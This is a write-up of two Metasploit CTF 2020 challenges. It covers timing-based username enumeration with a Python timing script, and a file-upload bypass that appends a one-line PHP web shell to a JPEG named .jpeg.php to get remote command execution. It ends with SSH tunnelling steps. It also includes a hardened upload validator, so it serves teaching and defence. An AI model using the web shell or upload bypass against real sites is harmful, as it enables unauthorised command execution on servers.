MetasploitCTF 2020 – Writeups

Recently I’ve been looking into Metasploit and HackTheBox (soon I will publish some write-ups of the boxes I’ve owned) and getting some experience pentesting machines. I came across this CTF a few days before it started, while looking for something else related to Metasploit, and decided to try it.

I was a bit disappointed because I was expecting more content similar to HackTheBox, so that I could practice more with Metasploit; instead it felt more similar to past CTFs I have taken part in, with a mixture of challenges resembling real-life situations and simple puzzles (I’m looking at you, Buffalo challenge on port 4545, which apparently someone solved by simply inputting the word buffalo 200 times).

The way this CTF was structured: you had access to 2 machines, one with Kali, to which you had to connect with the provided SSH keys, and the target machine, reachable only through the Kali machine. So the options (at least the ones I thought of) were two:

  • Connecting to the Kali machine, and then do everything from there, from the command line
  • Tunnel through SSH and then do everything with my local machine

I opted for the second option, since I was more comfortable using my own Kali with Burp and the other software and scripts I’m used to, but for some tests I also used the provided Kali machine (e.g. I had several connectivity issues with my home internet, so I uploaded a brute force script to the remote Kali machine and ran it from there, leaving it attempting passwords all night).

The target machine had a number of ports open, each one with a different challenge, so it was a matter of connecting to a specific port, solving the challenge and getting the flag. In this CTF the “flag” was the MD5 of a picture found on the target machine, named after a poker card. So you find the picture, compute its MD5 with a tool like md5sum, and submit it in the challenge section of the MetasploitCTF dashboard.

I engaged with a number of challenges, making progress on some of them, and in the end I found 2 flags (not counting a 3rd one, which was simply a welcome flag found on port 80 of the target machine).

Here’s the writeup of the two challenges.

metasploit ctf scoreboard

Scanning and enumeration

This was the NMap report with a list of all the open ports and challenges:

kali@kali:~$ nmap -T4 -A -p- 172.15.5.21
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-04 15:16 UTC
Nmap scan report for 172.15.5.21
Host is up (0.0092s latency).
Not shown: 65515 closed ports                                                                                                                                                                     
PORT     STATE SERVICE     VERSION                                                         
80/tcp   open  http        nginx 1.19.5                                                     
|_http-server-header: nginx/1.19.5                                                         
|_http-title: Metasploit CTF
1080/tcp open  socks5      (No authentication; connection failed)
| socks-auth-info: 
|_  No authentication
1337/tcp open  waste?
| fingerprint-strings: 
|   GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     Welcome to the '9 of Clubs' service.
|     -------------------------------
|     Please choose an option:
|     Send contact info
|     Greetings
|     Send feedback
|     Exit
|     Unknown option.
|     Welcome to the '9 of Clubs' service.
|     -------------------------------
|     Please choose an option:
|     Send contact info
|     Greetings
|     Send feedback
|     Exit
|   NULL: 
|     Welcome to the '9 of Clubs' service.
|     -------------------------------
|     Please choose an option:
|     Send contact info
|     Greetings
|     Send feedback
|_    Exit
4545/tcp open  http        SimpleHTTPServer 0.6 (Python 3.8.5)
|_http-server-header: SimpleHTTP/0.6 Python/3.8.5
|_http-title: Directory listing for /
5555/tcp open  telnet
| fingerprint-strings: 
|   NULL: 
|     [HSCORE: 0
|     [HSCORE: 1
|     [HSCORE: 2
|     [HSCORE: 3
|_    [HSCORE: 4
6868/tcp open  http        WSGIServer 0.2 (Python 3.8.5)
|_http-server-header: WSGIServer/0.2 CPython/3.8.5
|_http-title: Photos5u
8080/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
8092/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
8101/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 5 of Clubs Frontend
8123/tcp open  http        WSGIServer 0.2 (Python 3.8.5)
|_http-server-header: WSGIServer/0.2 CPython/3.8.5
|_http-title: Salt Free Hashes
8200/tcp open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Home
8201/tcp open  http        nginx 1.19.5
|_http-server-header: nginx/1.19.5
|_http-title: Did not follow redirect to http://intranet.metasploit.ctf:8201
8202/tcp open  http        nginx 1.19.5
|_http-server-header: nginx/1.19.5
|_http-title: Site doesn't have a title (text/html).
8888/tcp open  http        Werkzeug httpd 1.0.1 (Python 3.8.5)
|_http-title: Home
9000/tcp open  http        WEBrick httpd 1.6.0 (Ruby 2.7.0 (2019-12-25))
|_http-server-header: WEBrick/1.6.0 (Ruby/2.7.0/2019-12-25)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
9001/tcp open  http        Thin httpd
|_http-server-header: thin
|_http-title: CtfChallenge
9007/tcp open  http        Apache httpd 2.4.46 ((Unix))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Unix)
|_http-title: Index of /
9008/tcp open  java-object Java Object Serialization
9009/tcp open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4c:0f:d8:c5:a2:f1:54:f9:92:30:df:62:1f:52:e6:fe (RSA)
|   256 6e:b8:6f:94:e6:c0:2f:15:0c:80:71:32:cb:d0:2a:00 (ECDSA)
|_  256 8a:55:03:98:8e:87:29:50:66:1a:57:4c:5b:10:a4:01 (ED25519)
9010/tcp open  http        Apache httpd 2.4.38
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.2K  2020-12-01 15:29  QOH_Client.jar
|_
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /


Looks like there were a number of different services running on this Ubuntu 18.04 machine, like nginx/1.19.5, Apache/2.4.38, Werkzeug httpd 1.0.1, WEBrick httpd 1.6.0, WSGIServer 0.2, and other things that you would see by enumerating and investigating every single port/challenge.

Port 8080


metasploit ctf 8080

This challenge on port 8080 was about finding the other valid username besides ‘guest’. I tried ‘guest’ manually, plus a couple of common ones like ‘admin’. You would try to log in with some random credentials, and a new page would load with a message telling you whether the credentials used were valid or not.


I noticed that the loading time of the ‘guest’ attempt was much longer than the others. So I thought that this challenge could be solved by brute-forcing a number of different usernames and then checking which ones had a response time similar to ‘guest’. I usually use Burp Suite, but it’s the Community Edition, which throttles Intruder and slows down brute-forcing. I therefore decided to use OWASP ZAP, a perfectly fine alternative to Burp Suite (maybe even better in some respects), which has no such limitation.

I first tried xato-net-10-million-passwords-1000.txt with 10k passwords but didn’t find anything, and the same with the famous rockyou list. So I decided to use the full 10 million xato password list and I found another username with a response time longer than the others: ‘demo’.

I submitted my answer on the site and boom: flag found.
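The same timing side channel can be scripted instead of eyeballed in a ZAP results table. The block below is an added example, not the author’s ZAP run or anything from the CTF: it times several requests per candidate, takes the median so a single slow packet does not produce a false hit, and flags names that are both a multiple of, and an absolute margin above, the baseline. The `http_probe` function and its form field names (`username`, `password`) are assumptions for a real target; `fake_probe` and `VALID_USERS` are a constructed stand-in so the example runs offline.

```python
import statistics
import time
import urllib.parse
import urllib.request


def http_probe(url, username, password="x", timeout=10):
    """One real login attempt (hypothetical target; field names are assumed).

    Only the elapsed time matters, so the body is read and discarded.
    """
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        resp.read()


def measure(probe, username, samples=3):
    """Median wall-clock seconds of `samples` probes for one username.

    The median resists one-off network jitter better than the mean.
    """
    times = []
    for _ in range(samples):
        start = time.perf_counter()
        probe(username)
        times.append(time.perf_counter() - start)
    return statistics.median(times)


def find_slow_usernames(probe, usernames, samples=3, factor=3.0, min_delta=0.05):
    """Return (username, seconds) for candidates whose time is an outlier.

    The baseline is the median over all candidates, on the assumption that
    most names in a wordlist are invalid. A candidate is flagged only when it
    is both `factor` times slower than the baseline and at least `min_delta`
    seconds slower, so tiny absolute differences on a fast link are ignored.
    """
    timings = {u: measure(probe, u, samples) for u in usernames}
    baseline = statistics.median(timings.values())
    threshold = max(baseline * factor, baseline + min_delta)
    return [(u, t) for u, t in timings.items() if t > threshold]


# Constructed stand-in for the port-8080 login page: valid users answer slower.
VALID_USERS = {"guest", "demo"}


def fake_probe(username):
    time.sleep(0.15 if username in VALID_USERS else 0.01)


# Constructed mini wordlist standing in for the xato list.
CANDIDATES = ["admin", "guest", "root", "demo", "test", "user"]


def demo():
    """Names flagged against the fake target, in wordlist order."""
    return [u for u, _ in find_slow_usernames(fake_probe, CANDIDATES)]


if __name__ == "__main__":
    print("slow usernames:", demo())
```

Against a live target you would pass `lambda u: http_probe("http://localhost:8880/login", u)` as the probe and a real wordlist as the candidates; the per-candidate sample count is the knob to turn up if the link is noisy.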

metasploitctf flag card

Port 8200

metasploit 8200 home page

This port had a simple website behind it, with a gallery of images (on the View page) and a page to upload pictures.

So the first thing I thought of was to try uploading a shell instead of a picture. I loaded Burp Suite, set up the proxy to intercept the requests and tried to upload a shell.php renamed to .jpg.

After a few attempts it was clear that the uploader checked two things:

  • The extension of the file
  • The MIME type

What I did then was to create a file harp.php with this one-line PHP shell inside (the backticks are PHP’s shell-execution operator, so whatever arrives in the harpo query parameter is run as a shell command and its output is echoed back):

<?=`$_GET[harpo]`?>

then append it to a real image I had downloaded, using the Kali command line:

cat hackerman.jpeg harp.php > harpocrates.jpeg.php


This step was necessary to bypass the MIME type check. I originally tried to simply prepend the JPEG file signature to the shell code by forging the request in Burp, but for some reason it didn’t work, so I resorted to using a real image and appending the shell code at the bottom.
I also had to rename the file to .jpeg.php to pass the extension check: the .jpeg in the name satisfied the filter, while Apache, which picks the handler from the last extension, presumably still executed the file as PHP.

At that point I simply had to visit <URL_of_file>/harpocrates.jpeg.php?harpo=<command> and I could run all the commands I needed, like ls -la to see the content of the folder, whoami to see the user, etc.

web shell command code
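To make the two checks and the bypass concrete, here is an added example (my code, not the challenge’s uploader, whose exact logic is unknown beyond the fact that real image bytes under a .jpeg.php name got through). `weak_check` is a reconstruction of a filter that only needs an image extension somewhere in the name plus a valid image signature; `strict_check` does the same two checks properly: one extension taken from the end of the name, the sniffed type must match it, and nothing may follow the image’s end marker, which is exactly where the `cat` trick puts the PHP. `minimal_jpeg` is a constructed stand-in for hackerman.jpeg.

```python
import re

JPEG_MAGIC, JPEG_END = b"\xff\xd8\xff", b"\xff\xd9"
PNG_MAGIC, PNG_END = b"\x89PNG\r\n\x1a\n", b"IEND\xae\x42\x60\x82"
# The one-liner from the write-up: PHP backticks run the parameter as a shell command.
PHP_SHELL = b"<?=`$_GET[harpo]`?>"


def minimal_jpeg():
    """Constructed stand-in for hackerman.jpeg: SOI, a 16-byte JFIF APP0 segment, EOI."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"  # 14 bytes + 2 length bytes = 0x10
    return JPEG_MAGIC + b"\xe0\x00\x10" + app0 + JPEG_END


def build_polyglot(image, payload=PHP_SHELL):
    """Same as `cat hackerman.jpeg harp.php`: magic bytes stay at offset 0,
    the PHP sits after the EOI marker where image viewers ignore it."""
    return image + payload


def sniff(data):
    """Image type by file signature, independent of the Content-Type header."""
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    if data.startswith(PNG_MAGIC):
        return "png"
    return None


def weak_check(filename, data):
    """Reconstructed weak filter: any image extension anywhere in the name passes,
    and the signature check is satisfied by the prepended real image."""
    name = filename.lower()
    return any(ext in name for ext in (".jpg", ".jpeg", ".png")) and sniff(data) is not None


def strict_check(filename, data):
    """Hardened filter: exactly one extension, at the end of the name; sniffed type
    must match it; and the file must end at the format's end marker, so bytes
    appended after EOI/IEND are rejected."""
    m = re.fullmatch(r"[A-Za-z0-9_-]+\.(jpg|jpeg|png)", filename, re.IGNORECASE)
    if not m:
        return False
    ext = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png"}[m.group(1).lower()]
    kind = sniff(data)
    if kind != ext:
        return False
    return data.endswith(JPEG_END if kind == "jpeg" else PNG_END)


if __name__ == "__main__":
    poly = build_polyglot(minimal_jpeg())
    print("weak  :", weak_check("harpocrates.jpeg.php", poly))   # passes, as in the CTF
    print("strict:", strict_check("harpocrates.jpeg.php", poly))  # rejected on the name
    print("strict:", strict_check("harpocrates.jpeg", poly))      # rejected on trailing bytes
```

The trailing-bytes test is a heuristic (a payload can also be hidden inside a COM or APP segment), so the durable fixes are to re-encode every upload with an image library, store uploads outside any directory with a script handler, and serve them from there; the name and signature checks then only stop the cheap attempts.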

I’ll be honest, I spent much more time on this challenge than needed, because I wasn’t root and I was coming off a week of HTB challenges, so I spent some time trying to find a way to become root, upload a meterpreter shell, try other exploits, etc. For example I even uploaded a better shell, p0wny.

p0wny shell

In the end, the solution was much simpler. A couple of folders up, there was a hidden folder with the flag, so I simply visited that URL.

solution metasploit ctf

The above image also shows something worth noting: when running commands, you could read the response either in the “Response” tab in Burp or by opening the page with the browser’s view-source option, which made the output much clearer, since the shell returns raw text that the browser otherwise renders as HTML and collapses the whitespace of. If you look at the previous image, the result of the ls -la command is not as readable as the one in the above image, on the left.

So, I went to that URL, grabbed the image and submitted its MD5. Challenge completed.

solution metasploit ctf 2020


Tunnelling through SSH

When looking at Discord/Slack, some people were asking how to connect to the target, as they weren’t used to the type of setup we had in this CTF, so I thought I would explain how I did it, in case anyone finds it useful in future situations.

Every team had a .pem file and two machines to use for the CTF: a Kali machine (to use as an entry point and/or the attacking machine) and a Target reachable from the Kali machine.

So I decided to use an SSH tunnel (a local port forward), opening a specific port on my localhost so that I could connect to the target directly from my host browser, sending the traffic through the Kali machine. To do that I used this command:

ssh -L <local_port>:<target_machine_IP>:<target_port> <username>@<kali_machine_IP> -i <pem_file> -M

so I would choose a random local port, and then (using the 8802 port challenge from above, my assigned Kali and Target machine IPs, and the pem key), the command would look like this:

ssh -L 8880:172.15.5.21:8802 kali@54.172.94.85 -i metasploit_ctf_kali_ssh_key.pem -M

After launching that command in the terminal, I simply had to open my browser and visit localhost:8880 to see the website of the challenge located on the target machine at port 8802. Of course, there was an HTTP service listening on that port, which is why I was using my browser to visit it. The forward itself is protocol-agnostic, so for other services (the telnet service on 5555, the Java client on 9010, SSH on 9009) you would forward the port the same way and point the matching client at localhost instead of a browser.